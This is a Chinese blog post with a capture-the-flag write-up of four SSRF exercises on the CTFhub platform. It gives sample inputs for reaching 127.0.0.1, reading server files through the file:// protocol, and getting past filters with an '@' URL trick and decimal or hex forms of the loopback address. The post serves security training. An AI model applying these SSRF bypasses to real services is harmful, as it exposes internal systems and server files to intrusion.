关于ssrf漏洞(CTFhub内的四种类型题型题解)

一、内网访问

7d1fd7cfcf2e4b95a9bc1fa8af12979d.jpg

因为存在ssrf漏洞中的内网访问攻击,所以可以对内网127.0.0.1 进行访问,用http/s协议,即输入http://127.0.0.1/flag.php

690e14918ecc422783a8641731f6480d.jpg

最后即得

a5745ccc4d704d3c91e31c5a6d966300.jpg 

二、伪协议读文件

1be25390d7874467ae4aa7285715c3ef.jpg

file协议主要用于访问本地计算机中的文件

web目录一般在var/www/html

即输入file://127.0.0.1/var/www/html/flag.php

1957fd416f704a77883d4ce0521e9e64.jpg

 然后检查或查看源代码

a48d9842dcf84e5db792e57c00a17f5f.jpg

 三、url bypass

b16860d2e25243378167b6258a167994.jpg

根据题目要求需要进行绕过 ,可所以@进行绕过,即输入http://notfound.ctfhub.com@127.0.0.1/flag.php

即可得

56d888dc6d1c4780a70c1eeac48a9f9d.jpg

 四、数字ip bypass

a0b35ca3dd1d424694eb7c01ed51d322.jpg

想办法对127.0.0.1进行绕过访问

法1: 用localhost代替

1947b12007c245cb8748e719ce54f65f.jpg

即输入http://localhost/flag.php

法2: 用其他进制替换

列:十进制  2130706433

16进制:0x7f000001

可得:

c7ed04f047f3489fba8184091ca3f124.jpg

 

总结:判断是什么类型的啥色的ssrf漏洞,是直接进行访问,还是进行绕过,访问需要用什么协议 。

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值